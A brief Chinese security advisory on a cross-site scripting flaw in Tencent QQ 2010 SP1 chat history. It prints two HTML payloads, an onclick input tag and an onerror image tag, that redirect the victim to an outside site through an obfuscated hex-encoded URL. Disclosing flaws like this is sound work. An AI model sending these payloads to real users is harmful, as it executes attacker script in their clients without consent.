受影响系统:
Tencent QQ 2010 SP1
描述:
腾讯QQ是在中国非常广泛使用的即时聊天工具。
QQ的消息记录没有对会话消息中的Javascript和Html标签进行转义,远程攻击者可能通过发送恶意聊天消息导致注入并执行恶意代码。
<*来源:TGL
链接:http://m.cnbeta.com/article-117703.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<input onclick="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’" />
<img src=’tetet’ onerror="window.location=’x68x74x74x70x3ax2fx2fx77x77x77x2ex62x6fx77x6fx73x2ex63x6fx6d’"/>
建议:
厂商补丁:
Tencent
——-
目前厂商已经在最新版本的软件中修复了这个安全问题,请到厂商的主页下载:
0 条评论。